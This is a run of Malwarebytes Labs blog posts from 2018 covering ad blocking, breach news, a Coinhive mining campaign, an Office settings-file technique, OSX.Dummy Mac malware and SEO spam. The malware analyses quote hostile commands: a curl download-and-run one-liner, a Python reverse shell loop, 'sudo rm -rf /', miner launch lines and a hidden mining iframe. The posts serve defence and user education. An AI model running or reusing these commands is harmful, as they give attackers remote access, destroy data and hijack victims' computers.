Consider for a moment this blog post released by Google earlier this year, which sheds some light on the number of malicious ads that were blocked through the ad ecosystem. In the post, Google stipulates that 3.2 billion ads were removed in 2017 for violating advertising policies. That translates to 100 advertisements for every single second, of every day, for the entire year! Of these ads, 79 million were pushing malware-laden websites. And that’s in addition to the more than 320,000 publishers that were blacklisted, and over 1 million websites and apps that were removed or blocked.

That’s a lot of bad ads!

Setting aside Google’s ability to block malicious content as it appears on their network, some may contend that with so much bad stuff out there, some things are bound to slip through the cracks every once in a while.

And, lest we forget, there are a plethora of other website, news, and advertising companies without the means or desire to police the content. Malicious actors can launch highly-targeted campaigns, which may only be visible to no more than a small handful of people, and which can often fly under the radar of security mechanisms and systems. Who out there wants to be the guinea pig and offer up their computer to the attackers when such lapses occur?

Don’t track me, bro

We’re all familiar with the Cambridge Analytica scandal involving the collection of approximately 87 million Facebook records. The highly-publicized event has led to insolvency proceedings against the company (though Cambridge Analytica may have been recently resurrected under the name Data Propria). People were outraged in part because the company had covertly collected and stored information on large swaths of the population without their consent. But what those same people may not understand is that Cambridge Analytica is not alone in this practice.

There are numerous organizations ranging from small one and two person operations, all the way up to mega-million dollar corporations that are involved in the process of collecting and selling consumer data. Data brokers, data warehouses, and data exchange platforms all provide tools and services to not only collect information, but also sort and organize the information in a manner that allows advertisers to target specific groups of users.

Online data broker offering “data that is only seconds old”

Few of these organizations have the express consent from users to harvest and store their information, and many lack even the most basic of security protocols to protect and maintain the information after it’s collected.

Consider the recent database exposure surrounding data broker, Exactis.  The company has recently been accused of having a poorly=secured server, which compromised nearly 340 million individual records containing everything from addresses, telephone numbers, and email addresses, to more than 400 different data points for habits, interests, and hobbies. All sorts of other personal details are tracked, harvested, and stored in these databases; everything from age all the way down to a person’s clothing size and shopping history. Do you smoke, drink, or enjoy gambling? That’s in there, too.

Exactis has over 3.5 billion records, with information on most of us

And who exactly is Exactis? The company claims to be a leading compiler and aggregator of business and consumer data. The information collected by the company is used for customer profiling and to assist marketers in identifying descriptive traits and customer segments to help better understand behavior. This information can then be used to direct targeted advertising to specific groups.

The company website claims to possess 3.5 billion records on 218 million individuals and 110 million households. When asked where the information originated, Night Lion Security founder Vinny Troia was quoted as saying, “It seems like this is a database with pretty much every US citizen in it. I don’t know where the data is coming from, but it’s one of the most comprehensive collections I’ve ever seen.”

While we may not know for certain, it’s probably a safe assumption that at least some of those records are obtained through the use of online trackers, and services that run silently in the background, tracking and logging your behavior each time you browse online.

Why do we continue to tolerate this sort of illicit data collection? Don’t be like Steve Huffman, the Reddit CEO who allowed himself to be targeted by a Facebook advertisement for the purpose of an employment solicitation.  Instead, use an ad blocker, which not only blocks the targeted trackers that are compromising your personal information and divulging your secrets to the highest bidder, but will also prevent the targeted ad from being shown, thus, reducing your exposure to infection and solicitation.

No, it’s not morally unconscionable to use an ad blocker

Despite the notices, pleas from website owners, and the position from advertisers and publishers that ad-blocking will destroy the internet as we know it, there are no laws against using an ad blocker to prevent objectionable content from appearing on any device that you own or use.

In a long-followed case that transcended all the way to the German Supreme Court, European publisher Axel Springer was defeated in a years-long battle against Adblock Plus publisher Eyeo, after failing to persuade the court that the ad blocker violated competition law and was engaging in legally-dubious business policies. (Their business model allowed for unblocking ads deemed as “acceptable,” as well as those who paid for such distinction.)

The court ruling puts an end to Springer’s quest of having ad blocking deemed illegal. The ruling also vindicates users continued use of blocking software to prevent unwanted or objectionable content from being shown.

Americans are likely to have equally strong, if not stronger, ad blocking protections than our German friends.

When searching through dockets and filings provided by, Eyeo, the parent company of AdBlock Plus, shows not a single case which the company has been required to defend due to its practice of blocking advertisements. And really, it’s almost a bit of a stretch to envision an American jury being persuaded by the argument of advertisers having the right to display content, but consumers not possessing the right to block said content when they don’t approve.

Therefore, with no laws preventing the use of an ad blocker, and with the counter argument simply reduced to the corporate mantra of “maximizing profits,” consumers are free to choose the security policy that best fits their needs.

Convinced yet?

We’ve seen that ads not only diminish the user experience of ingesting content, but that they also pose a substantial risk to consumers.

The potential for malvertising to successfully deploy a nasty payload to your machine, which may compromise your system and jeopardize your financial security, is real. Worse yet, these types of attacks don’t even require user interaction and can execute merely by visiting the page.

And if the threat of financial ruin is of no concern, then the privacy-invading act of data harvesting should be.

The array of data collectors and data brokers out there is mind boggling, and they are all struggling to associate your actions and behaviors to groups and other individuals for no other purpose than to create targeted ads and increase profits. The information collected by these organizations may be poorly secured and is a potential gold mine for any cybercriminal.

And if the moral conviction of blocking the advertisements of your favorite websites has thus-far prevented the adoption of ad-blocking technology, then the knowledge of an ever-growing advertising ecosystem and the lack of laws preventing ad-blocking mechanisms should ease those concerns. Yes, we all want to generate revenue for our brand, but personally I’d rather not help do that at the sake of potential identity theft, or worse, having my PC compromised by a malware attack originating from a rogue advertisement on a popular website.

Coming up 

In Part 2 of this series, we’re going to have a look at some of the common ad-blocking utilities and how to configure those tools to fit the needs of the individual user. We’ll show how to navigate user-friendly settings that are simple enough to use on Grandma’s computer. We’ll also take a deep dive into some more advanced configurations and tools that may require a shift in user mind-set, usage, and understanding before fully realizing the benefits such configurations provide.

We’ll cover blocking ads on both mobile and PC devices, as well as configuring a network solution to block ads throughout your entire environment.

So stay tuned to the Malwarebytes blog, or follow this post and we’ll update it with links once available.

The post Everybody and their mother is blocking ads, so why aren’t you? appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Can we trust our online project management tools?

Malware Bytes Security - Fri, 07/06/2018 - 11:00am

How would you feel about sharing confidential information about your company on Twitter or Facebook? That doesn’t sound right, does it? So, in a corporate life where we keep our work calendars online, and where we work together on projects using online flow-planners and online project management software, it might pay off to wonder whether the shared content is safe from prying eyes.

What are we looking at?

From the easy-to-use shared document on Google Drive to full-fledged Trello boards that we use to manage complicated projects—basically everything that uses the cloud as a server is our subject here. When evaluating your online project management tools, it is important from a security standpoint to have an overview of:

  • Which online project management platforms are you using?
  • Which data are you sharing on which platforms?
  • Who has access to those data?

Once you know this, you can move on to the main question:

  • Is the data that should stay confidential shielded well enough?
What are the risks?

The risks of using online project management tools are made up of several elements. Once again, a list of questions will help you gage this, including:

  • How secure is the platform you are using?
  • Do the people that have access to the data need to have access? And are they given access to see all the information that is shared, or just a portion?

As you can see, we are not just worrying about outsiders getting ahold of information. Sometimes, we must keep secrets, even from our own co-workers. Not every company has an open salary policy, for example, so the information how much everyone makes might not be allowed outside of HR.

But the threat of a breach is the most important one. Having the competition know about the latest project your design team is working on can be deadly in some industries. And of course, any project that contains customer data and is not secured can be breached by a cybercriminal. Knowing this, it’s our job to help you find the safest possible tool to perform your job.

Does it make sense to share online?

Are we sharing information online because we need to do it online or just because we can? Sometimes being the cool kids that use an online project management platform that has all the bells and whistles is more a matter of convenience than it is strictly necessary. But if you are:

  • employing remote workers
  • cooperating between offices around the world
  • heavily relying on a BYOD strategy

then online tools maybe the only way to realize your project management goals.

Every ounce of prevention

What you don’t share can’t get lost. And control over what you do share (and with whom) is adamant.

  • Limit the amount of privileged information you are sharing. Make sure that only the information needed for the project is being shared with the appropriate team members.
  • Change the login credentials at a regular interval, and do this in a non-predictable way. Going from “passwordMay” to “passwordJune” at the end of the month will not stop nosy co-workers from digging. Do not post the new credentials on the platform, either.
  • Use 2FA where and if possible to enhance login security.
  • Update and patch the software as soon as possible. This limits the risk of anyone abusing a published vulnerability in the platform.
  • Keep tally of who is supposed to have access at all times, and check this against the connected devices when and if you can.
Breach management

Hardening your online tools against breaches is usually in the hands of toolmakers themselves—the software provider or the cloud service provider with whom you’ve partnered. Therefore, it makes sense to look into the project management tool’s reputation for security, as well as its ability to serve your company’s needs. While you can’t control the security of the tool itself, you can limit the consequences of a mishap, should it occur, by doing the following:

  • Don’t try to keep it a secret when credentials have been found in the wrong hands. Making participants aware of the situation helps them to change passwords and follow up with other appropriate actions.
  • Make sure there are backups of important data. Someone with unauthorized access may believe in burning the bridges behind them.
  • In case of a breach, try your best to find out exactly how it happened. Was there a vulnerability in the tool? Did a team member open up a malicious attachment? This will assist you in preventing similar attacks.
Controlling the risks

Working in the cloud can be useful for project management, but sometimes we need a reminder that there are risks involved. If you set up an online project management tool or other cloud-based project, it’s good to be aware of these risks and give some thought to the ways you can limit them.

When you’re working on a project for your company—whether it’s leading a team or participating in the project’s development—it’s important to make data losses as rare as possible, to learn from your mistakes, and to handle breaches and other security incidents responsibly.

Stay safe out there!

The post Can we trust our online project management tools? appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Obfuscated Coinhive shortlink reveals larger mining operation

Malware Bytes Security - Tue, 07/03/2018 - 11:00am

During the past several months, in-browser mining has continued to affect a large number of websites, predominantly relying on Coinhive’s infamous API. We documented several campaigns on this blog, in particular Drupalgeddon, where attackers are taking advantage of vulnerabilities in popular Content Management Systems (CMS) to compromise websites and push payloads both client- and server-side.

In the past weeks, our crawlers have catalogued several hundred sites using a variety of CMS all injected with the same obfuscated code that uses Coinhive’s shortlink to perform silent drive-by mining. By pivoting on this indicator of compromise, we were able to identify a larger infrastructure receiving traffic from several thousand hacked sites acting as doorways to redirect traffic to a central server involved in the distribution of both web and standard malware coin miners.

Figure 1: Mining operation fueled by compromised sites

Obfuscated miner injection

As part of our regular crawls, we look for known redirects to sites of interest and lately, most have been related to Coinhive domains. We detected hundreds of new domains, all legitimate websites that were injected with a blurb of hexadecimal code. Once decoded, it shows as an invisible iframe (1×1 pixel) to cnhv[.]co/3h2b2. We believe it is part of the same campaign that was exposed by the folks over at Sucuri at the end of May.

<i frame src="https://cnhv[.]co/3h2b2" width="1" height="1" align="left"></i frame>

Figure 2: A WordPress site injected with an obfuscated iframe loading Coinhive’s API

The cnhv[.]co domain name is used for what Coinhive calls shortlinks, essentially a way of monetizing on hyperlinks by making visitors’ browsers solve a certain number of hashes before they reach their destination site. When clicking on such a link, you will see a progress bar and within a few seconds, you will be redirected. Crooks are abusing this feature by loading those shortlinks as hidden iframes with an unreasonably high hash count.

Figure 3: Shortlink is taxing our CPU at 100% 

In Figure 3 where we made the iframe visible by by changing its dimensions, to show that rather than wait for a few seconds before being redirected, users will unknowingly be mining for as long as they stay on the page. Indeed, while Coinhive’s default setting is set to 1024 hashes, this one requires 3,712,000 before loading the destination URL.

Backdoor initiated redirection

Querying, we were able to find the same Coinhive key active as early as May 7 via a different redirection mechanism. There is a specific URI pattern indicating that hacked sites are being leveraged to perform a redirect to a server at 5.45.79[.]15. This in turn creates a redirection via another crafted URI where one of the parameters is the referrer site, ultimately leading to the Coinhive shortlink that will start the web miner.

Figure 4: The same shortlink was found loaded from a compromised website via an intermediary server

Several sites have been injected with both the hidden cnvh[.]co iframe method, as well as via backdoors:

Figure 5: A hacked site injected with Coinhive’s shortlink and multiple compromised URLs

The URI pattern used for the redirections can be identified by the following regular expression:

Figure 6: A regular expression showing a match between compromised sites

Blackhat SEO and doorways

Looking at those URIs again, we can note the presence of certain keywords that appear to be Search Engine Optimization (SEO) related, for instance:

cctvvietnam[.]com/1hqg/wzdea.php?lrscye=mongodb-count-fields[.]uk/9ul8/6nfme.php?lrscye=relativity-software-cost valam[.]in/f8wb/z8d6w.php?lrscye=tutoring-in-egypt stemat[.]pl/klwy/dzwfy.php?lrscye=vin-decoder-mercedes whylab[.]nl/podd/1hwnz.php?lrscye=gpon-home-gateway-exploit soho-dom[.]ru/el5p/ywuul.php?lrscye=bts-album-download-zip

We confirmed that indeed some Google or Bing searches showed us results that included the list of compromised sites that are acting as “doorways,” usually to a traffic distribution system or redirector (5.45.79[.]15). In this case, the doorways are used to trick people into downloading malicious coin miners instead of the file they were looking for.

Figure 7: Despite appearances, this file is not 100 percent clean

Note how the server at 5.45.79[.]15 is performing the redirection to another hacked sited (motoir[.]com), where the keywords passed from the URI are dynamically used to create what looks like a unique download page and file.

Figure 8: Web traffic showing the redirection sequence

Malicious coin miners

Upon execution, this executable will unpack the following three binaries:

  1. winsystem.exe: the XMRig miner
  2. clock.exe: .bat file wrapped into an EXE contains commands
  3. netflash.exe: a very simple downloader, written in .NET.

The batch script adds persistence by setting a registry entry, kills certain processes (possible miners already running), and starts mining by launching:

winsystem.exe -B -a cryptonight -o 37.1.197[.]121:80 -p x -u %COMPUTERNAME% +500 --max-cpu-usage=30 --donate-level=1 -k

Figure 9: Batch script revealing the mining code

The fake download binaries are based on the same code from a miner, unsurprisingly, hosted at 5.45.79[.]15/xxxphoto.exe. Using VirusTotal Intelligence, we were able to expand on this infrastructure and identify another coin miner, which is an ELF file this time, based on this cnrig library, hosted at: 5.45.79[.]15/monero/cnrig.

Figure 10: Graph showing an ELF and Win32 miner hosted on the same server

A comment left on this VirusTotal report page indicates that this miner was found on an infected server and pulled down from a PHP backdoor called zz1.php. Searching for that file name, we located a possible candidate uploaded to a public site. Decoding the Base64 encoded strings, we can assert with greater confidence that this is the malicious PHP file used by the attackers to download the Linux coin miner from 5.45.79[.]15/monero/cnrig:

Figure 11: PHP code uploaded into compromised sites responsible for ELF miner download

Once it has retrieved the ELF binary, it runs it, using the following command in order to begin mining:

./cnrig -o 5.61.46[.]146:80 --donate-level=1 > /dev/null 2>&1 Proxies

Because the miners are connecting to private pools (and likely via proxy) without using a wallet address, we cannot assess how much money the perpetrators have generated with this scheme.

In fact, the server at 5.45.79[.]15 also has its own ProxyPanel:

Figure 12: A proxy based on xmrig-proxy

The XMRig version of the miner had a public stats page indicating that there were close to 500 infected machines that had participated in the mining activity. For the CNRig version, we weren’t able to find any such stat, although the number of hacked servers was much higher.

A growing number of sites

The interest surrounding cryptocurrencies has drastically changed the malware landscape with criminals hoping to get a piece of the action. As such, a growing number of websites are being compromised both client- and server-side to distribute and run coin miners.

In this campaign, we see infrastructure used to push an XMRig miner onto users by tricking them into downloading files they were searching for online. In the meantime, hacked servers are instructed to download and run a Linux miner, generating profits for the perpetrators but incurring costs for their owners. Finally, it seems only fitting to see an abuse of Coinhive’s shortlinks to perform in-browser mining.

Malwarebytes blocks malicious mining, whether it is triggered by malware or loaded via compromised websites.

Thanks to @DynamicAnalysis for sharing additional information.

Indicators of compromise

String for obfuscated cnvh[.]co injection


Coinhive shortlink


Coinhive site key


Regex for compromised sites redirection


Redirection server


Windows miner dropper

5.45.79[.]15/xxxphoto.exe 38f55239519523638dc2b3958f5e9951a6b04f813336927a4f7de717518e5b44

Linux miner

5.45.79[.]15/monero/cnrig c890d18fe3753a9ea4d026fc713247a9b83070b6fe40539779327501916be031

The post Obfuscated Coinhive shortlink reveals larger mining operation appeared first on Malwarebytes Labs.

Categories: Malware Bytes

New macro-less technique to distribute malware

Malware Bytes Security - Mon, 07/02/2018 - 5:12pm

One of the most common and effective infection vectors, especially for businesses, is the use of malicious Office documents. This year alone, we witnessed two zero-days for both Flash and the VBScript engine, which were first actually embedded into Office documents before gaining wider adoption in web exploit kits.

In addition to leveraging software vulnerabilities, attackers are regularly abusing normal Office features, such as macros, or more obscure ones like Dynamic Data Exchange (DDE), and of course Object Linking and Embedding (OLE) attacks, which can also be mixed with exploits. System administrators can harden endpoints by disabling certain features company-wide, for example to foil certain social engineering schemes that try to trick users to enable a malicious macro. In recent versions of Office, Microsoft is also blocking the activation of objects considered high risk, based on a list of extensions that can be customized via Group Policy.

But a recent discovery by security researcher Matt Nelson, shows that yet another infection vector can be tapped into, one that circumvents the current protection settings and even Microsoft’s new Attack Surface Reduction technology. By embedding a specially-crafted settings file into an Office document, an attacker can trick a user to run malicious code without any further warning or notification.

The file format, specific to Windows 10 called, is essentially XML code that is used to create shortcuts to the Control Panel. This feature can be abused because one of its elements (DeepLink) allows for any binary with parameters to be executed. All that an attacker needs to do is add his own command using Powershell.exe or Cmd.exe. And the rest is history.

A new script found by Nick Carr shows an attack where PowerShell is invoked to download and execute a Trojan (VT report). According to Matt Nelson, who discovered this new technique, Microsoft is not going to fix it, at least for the time being.

We tested this sample in our lab and are happy to report that Malwarebytes users are already protected:

During the past few years, while there has been little development with web exploit kits, there has been a lot of activity with document exploit kits such as Microsoft Word Intruder (WMI) or Threadkit. These toolkits allow attackers to craft lures and embed the exploit(s) of their choice before either spear phishing their victims or sending the file via larger spam campaigns. At the same time, it looks like classic social engineering attacks aren’t going anywhere anytime soon and will keep capitalizing on the human element.

It is import for end users and businesses to recognize that malicious documents represent a very real threat and require adequate protection and training to fend against.

The post New macro-less technique to distribute malware appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Mac malware targets cryptomining users

Malware Bytes Security - Mon, 07/02/2018 - 2:36pm

Last week, a security researcher named Remco Verhoef announced the discovery of a new piece of Mac malware being distributed on cryptomining chat groups. This malware was later further analyzed by Patrick Wardle, who gave it the rather appropriate moniker OSX.Dummy.

The malware was being distributed by chat users posing as admins, who posted the following shell script for users to run:

cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script

This script downloads an executable file named script from a malicious site, gives it executable permissions, then launches it. This script is a ridiculous 34 megabytes in size, and seems to do no more than create a shell script file and a launch daemon to keep it running.

The shell script itself uses Python to open a reverse shell to port 1337 on a malicious server, giving the hacker behind the malware continued access to the computer.

#!/bin/bash while : do python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("",1337)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh","-i"]);' sleep 5 done

All in all, this malware is not particularly exceptional, and it lives up to the name OSX.Dummy in multiple ways. However, there are a few interesting things to note about this malware.

Risks posed by posted scripts

The method of distribution is interesting. People on forums and other online sources have been giving instructions that involve running commands at the command line—in the Terminal on a Mac—for many years, and still do today.

As an example, one user on Apple’s forums used to give users a highly obfuscated shell command consisting of tens of thousands of characters, with instructions to copy and paste it into the Terminal to run it. This script was run by users of the forums, and the output of the script posted there—thousands of times.

Fortunately, this script was not malicious, but it easily could have been, and its obfuscated nature should have raised suspicions. Yes users still ran it, without any understanding of what it did, because they trusted a stranger on a forum.

There have been other cases in the past of scripts being posted that were actually malicious in nature. The most well known of these was an infamous trick where users were told to run the following command to cure whatever problem they were having:

sudo rm -rf /

Unfortunately for users who actually followed directions like these, this command actually erases the hard drive.

Thus, there’s precedent for being suspicious of shell scripts posted online, yet even so, many people will still run highly suspicious scripts without a care. Readers are encouraged to educate users about the dangers of this behavior at every opportunity.

Risks posed by previous infections

When first run, the script executable asks for a password. This looks like the standard sudo behavior in the command line, but actually, the malware is getting the password. The malware creates a couple small data files called dumpdummy—one in /Users/Shared/ and one in /tmp/—and stores the password there, presumably for possible future use.

Having your password stored in clear text inside a file that can be readable by anyone on the computer poses a serious security threat. Worse, since this file is just data and not actually malicious, it’s likely that most antivirus software won’t detect it. This means that you might have removed the infection, but the dumpdummy file remains, posing a possible future security risk.

This is far from the first time that malware has done such things. This means that, even if your computer is not currently infected, it’s entirely possible that your password can be found in clear text somewhere on your hard drive, as a remnant from a previous infection. Future malware could be designed to find the locations of these files created by the previous malware, gaining access to your password for free.

Malwarebytes for Mac will remove such traces in addition to the malicious executables.

Risks posed by unsigned malware

Most, though not all, Mac malware these days is cryptographically signed with a certificate issued by Apple. These certificates are not hard to obtain, costing no more than $99 to get a developer account with Apple. The good thing about this is that once the malware is spotted by Apple, the certificate can be revoked, killing the malware.

However, there are some issues with the way macOS handles code signing, and this can’t be relied on. As Wardle pointed out in his analysis, the fact that this malware is not signed is irrelevant, since macOS does not check the code signature for a process that is executed from the command line.

More information on how code signing can be a problem on macOS will be presented at this year’s Virus Bulletin conference.

Target: cryptocurrency theft

In all, this malware is not highly likely to be widespread, and you’ll probably know if you’ve been infected after reading a description of the malware.

We don’t yet know exactly what the hacker(s) behind the malware may intend to do with access to the infected machines, but given the fact that cryptocurrency mining communities were targeted, it’s a fair bet that they were interested in theft of cryptocurrency.

If you think you might have been infected, Malwarebytes will remove the malware, including the dumpdummy files containing your password.

If you do IT or security work for a business, be sure to block access to the IP address that the shell script will try to connect to (

The post Mac malware targets cryptomining users appeared first on Malwarebytes Labs.

Categories: Malware Bytes

A week in security (June 25 – July 1)

Malware Bytes Security - Mon, 07/02/2018 - 1:56pm

Last week on Labs, we looked at comment moderation duties, Viagra spam on a news-making restaurant’s website, and how to manage your child’s online presence for Internet safety month. We also looked at a set of big breaches and leaks, as well as malware threats with a World Cup vibe.

Other news

Stay safe, everyone!

The post A week in security (June 25 – July 1) appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Major data breaches at Adidas, Ticketmaster pummel web users

Malware Bytes Security - Fri, 06/29/2018 - 2:00pm

There’s been a number of data breaches and accidental data exposures coming to light in the last few days, and no matter where in the world you happen to be located, you’ll want to do some due diligence and see if you’ve been affected. These aren’t small fishes being preyed upon by black hats; we’re talking Adidas, Ticketmaster, and Exactis, the last one being a particularly big issue, despite being a company you may not have even heard of up until now. Shall we take a look?

This breach isn’t very sporting

Adidas, famous sporting equipment creator, revealed a breach in a somewhat short public statement late on Thursday evening. They stated:

According to the preliminary investigation, the limited data includes contact information, usernames and encrypted passwords. Adidas has no reason to believe that any credit card or fitness information of those consumers was impacted.

While there’s no information on exact numbers at this stage beyond references to “a few million,” they do mention that the only customers affected so far are thought to be those who made a purchase via

Something of note: They claim to have first noticed the breach on June 26, and have made a public notification two days later. In a realm where huge data breaches can be revealed many months or in some cases years after an attack has taken place, this is impressive (though also now required by GDPR).

It’s important to recognise, however, that at this point, we don’t know if the breach itself took place on June 26 or if Adidas became aware of it on that date, because it sounds as though someone noticed a third party trying to sell the stolen data. All the same, this is a rapid turnaround and helpful for anyone wishing to keep an eye on transactions after having used the above Adidas portal.

The golden ticket

The UK didn’t escape from the blast of breaches rumbling on beneath the surface, as the massive ticket sales/distribution company Ticketmaster fell foul of payment data shenanigans. A code library used to power a third party customer support agent is claimed to have been sending payment data to an unknown third party whenever a customer bought tickets. According to the statement provided by the support agent tool creators, a single unauthorised line of Javascript was all it took to cause the problem.

That single line of code, implemented on the payment page, has resulted in up to 40,000 people having their data swiped. If you made a payment somewhere around February to June this year, or anything from September 2017 to this week if you’re an international customer, you could be at risk. Where this story becomes particularly problematic is that digital bank Monzo claims they tried to warn Ticketmaster about the problem back in April of this year, but their warnings went unheeded. Now they’re faced with a so-called perfect storm of bad comms and a significantly harsher round of press-related spotlights.

Fixing a leak

This last incident is less about payment information and more about personal information. It’s also more accurately described as a potential accidental exposure of information, which others may have accessed without permission. Exactis, a marketing firm with a “universal data warehouse” storing 3.5 billion consumer, business, and digital records, have found themselves at the heart of the controversy due to researcher Vinny Troia finding a large slice of data on a publicly-accessible server.

The data are made up of some 340 million records, weighing in at about 2 terabytes. The records contained incredibly detailed information on American consumers, including home addresses, phone numbers, emails, and other “personal characteristics,” including habits, children’s ages, and more. At time of writing, no payment or social security information has been found—so that’s one small silver lining.

However, anyone caught up in the exposed data could find themselves at increased risk of phishing or social engineering attacks if criminals were able to dig into it before the researcher sounded the alarm. It also means bad actors could potentially use detailed information to impersonate the person on file and use that to social engineer someone else.

What can I do?

Unfortunately, there’s only so much you can do in front of your computer where a breach is concerned, because unlike the device in front of you, it’s almost entirely out of your hands. When data is exposed, or someone grabs a pile of payment information, much of what happens next is down to the company responsible for safe keeping. Are payment records encrypted? Are passwords recorded in plain text? Is your entire personal history sitting on a server somewhere, ready to be grabbed by a crew of black hats or a curious observer?

A touch alarming, perhaps, but that’s the reality of doing business online, whether you’re looking to buy something, register somewhere, or simply hand over marketing information while browsing the web. If you’re caught in a breach or a leak, then perform due diligence and cancel your cards, heighten your awareness for phishing/social engineering scams, and take advantage of the typically free credit monitoring services offered post incident. If you follow those directions, you’re doing everything you can to keep things under control on your end.

The important thing to remember is not to panic, and don’t feel too bad should you believe your information to be compromised. We’re probably all going to end up in that position at some point, so you’re in good company.

The post Major data breaches at Adidas, Ticketmaster pummel web users appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Internet Safety Month: How to manage your child’s online presence

Malware Bytes Security - Thu, 06/28/2018 - 11:32am

When you hear the term “reputation risk management,” you might think of a buzzword used in the business sector. Reputation risk management is a term used to describe how companies identify potential risks that may harm their reputation and mitigate them before they blow off.

As companies grow, so grows their public reputation. Heading potential PR disasters or credible crises off at the pass can keep organizations from losing revenue, confidence, and trust from their clients. Suffice it to say, putting your best foot forward and keeping it there is crucial.

Now, here’s a thought: If businesses know they have much to lose if their reputation is threatened, shouldn’t parents and guardians also consider that their children can lose out if their digital footprint is at risk?

To cap off Internet Safety Month, we’re going to ditch the buzzword in favor of a phrase that parents, teens, and young kids can easily grasp: You must manage your online presence. Before we delve into how parents and guardians can take charge, it is crucial that we first understand one thing when it comes to having a digital life:

Your online presence is your online reputation 

Our digital footprint starts the moment we or someone we know shares something about us online. This could be a solo or group photo, a Facebook status update, or a name mention in a Tweet. Even those who claim to be inactive on the Internet can still have an online presence, thanks to other people in their lives.

Our footprints don’t stop at our first “Hello, World!” though. The more we use the Internet, and the more we’re included in other people’s social media feeds, the more of our footprints are left for anyone online to see. These marks we leave behind can be collectively referred to as our online presence. How we present ourselves to and conduct ourselves in the digital world affects how people perceive us online—now and in the future.

Having an online presence, whether it’s a positive on negative one, affects our reputation—online and in the real world. If “Jane Doe” is known to exhibit behavior tantamount to bullying in a forum she frequents, she already has a bad reputation in that community. Who she is and how she behaves in that community can also spill over to other online forum communities as well.

There are consequences for bad behavior online. She may be blocked from those communities. Or worse, someone may Google her name and become aware of her bullying behavior online. She could feel the impact of her negative actions in the workplace or beyond when coworkers or friends become aware that Doe is engaged in bullying in forums, they can assume that she has the tendency to bully people in real life as well.

Leaving only negative digital footprints online, then, has no longer become an option.

What you can tell your kids to manage their online presence

“Google yourself.” Maybe it has been a while since your kid started using the Internet, or you and your child are just curious of what might come up. (Hint: type your name in quotes) Either way, it’s advisable to look up where your name, public posts, and/or photos end up every now and then.

If your child has a common name, you can further add modifiers (like the school they go to or city/state/town you live in). Just run many searches with varying modifier combinations and see what comes up. As for photos, you can use Google’s image and reverse image searches. To do the latter, go to the Google Image Search page and click the camera icon in the search bar. You can then paste the URL of an image you have of your child (in the first tab) or drag-and-drop to upload their picture (in the second tab), so Google can crawl the web in search for other copies of the one you just provided.

Google Image Search page processing the image you uploaded for reverse lock-up

Other things you can use to search for are email addresses, social media usernames, and phone numbers. You can also set up Google to alert you if other information about your child (like their name) pops up on the Internet at some point in the future.

“Watch out for information you don’t want made public.” It’s possible that you may have already stumbled upon a few pieces of information or pictures you or your child may not want online, or at least visible to the public. This information may have been put up years ago or yesterday.

Posts can be easily removed on sites you or your child can control, such as Facebook and Twitter. But for third-party sites, it may need a bit of legwork. For copyrighted material such as photos, you can contact the site owners and reference the Digital Millennium Copyright Act (DMCA) [PDF]. As the parent or responsible adult, you may also need to contact each website that has information about your child that you don’t want there.

It’s also time to review those security and privacy settings of your child’s accounts to see if there has been a policy update or if you need to modify additional settings.

Read: Internet Safety Month: How to protect your child’s privacy online

“Start cleaning up your online act.” A good starting point will be teaching them good computing and Internet practices, if you haven’t already. We have various references of how one can do this here on the Malwarebytes Labs blog. So to avoid reinventing the wheel, below are the links you may want to visit and read up on:

The work doesn’t stop here, though. Parents and guardians should also put great emphasis on kindness, understanding, and patience when they treat or deal with other Internet users. Hiding behind the screen shouldn’t merit one to forgo these values.

Lastly, impress in them the idea of thinking first before posting anything. Online, it’s easy enough for anyone to misconstrue what one is trying to say because cues like facial expressions and body language are non-existent. A flippant joke or a sarcastic remark could start a flame war. Even an innocent post can sometimes get someone else in trouble.

“Deactivate/Delete accounts you’re no longer using.” This may seem obvious, but at times, accounts that are no longer used are left active for an indefinite and extended period because your child may have decided to use another account, or wholly avoided people in a particular online community. The latter is one of the best reasons why your child’s account should be deactivated. This is especially helpful if, for example, your child was caught in a crossfire between warring parties and one group started targeting him or her via that account. Save everyone the headache (and the insanity) and deactivate the account.

In a perfect world…

…every Internet user would be sharing all of their achievements, and everyone would be applauding. Every Internet user would be encouraging everyone who needs encouraging. Every Internet user would be honest, civil, and tactful. Every Internet user would be sharing photos of only their best, wholesome selfies, their cats, and funny GIFs.

But this isn’t a perfect world. Someone will always say something that another may find offensive. Someone will put someone else down, talk in Caps Lock, and share photos of their wild partying or of a drunk friend who passed out on a sidewalk. In the end, realize that there is data online about someone that puts them in a bad light. Your child may not be exempted. So help them take control and guide them on how to be more responsible with what they share now and in the future.

Good luck!

The post Internet Safety Month: How to manage your child’s online presence appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Red Hen website suffers SEO spam compromise

Malware Bytes Security - Wed, 06/27/2018 - 5:11pm

If you’re thinking about checking out the website owned by the restaurant that asked White House press secretary Sarah Huckabee Sanders to leave the premises, you might want to hold off. There’s some site compromise action afoot.

Although the homepage appears to be acting in a perfectly normal manner, turning off scripts so you can see what’s happening under the hood provides a rather stark visual discrepancy.

Visiting as normal:

Click to enlarge

Visiting with scripts turned off:

Click to enlarge

Why yes, that’s a collection of Viagra spam text injected into the website with the aim of giving a search engine boost to the sites linked. What you’re seeing here is the otherwise “hidden” code leaking through onto the page; it actually resides in the HTML source like so:

Click to enlarge

The sites hoping to get a search engine boost from the compromised restaurant page are pushing pharmaceuticals. Here’s the first example, a shopping portal for Generic Viagra:

Click to enlarge

The second is for a prescription drug I’m not even going to attempt to pronounce:

Click to enlarge

Old hat

This is an absolutely ancient black hat tactic, most typically referred to as a form of SEO (Search Engine Optimisation) spam, or “Spamdexing.” Threat actors either use dirty SEO tactics to drive high traffic to their pages or they capitalize on already highly-trafficked targets by hiding their links in subtext. The most common forms down the years have tended to be one of the following:

  1. Keyword stuffing, where lots of content-specific words are jammed into the text of an article to artificially drive traffic in ways that would otherwise make little sense.
  2. Scraper sites, which pillage content from other places and occasionally remove things like the author or company name, hoping to make some ad-based revenue from the multitude of flashing banners hosted on their own website.
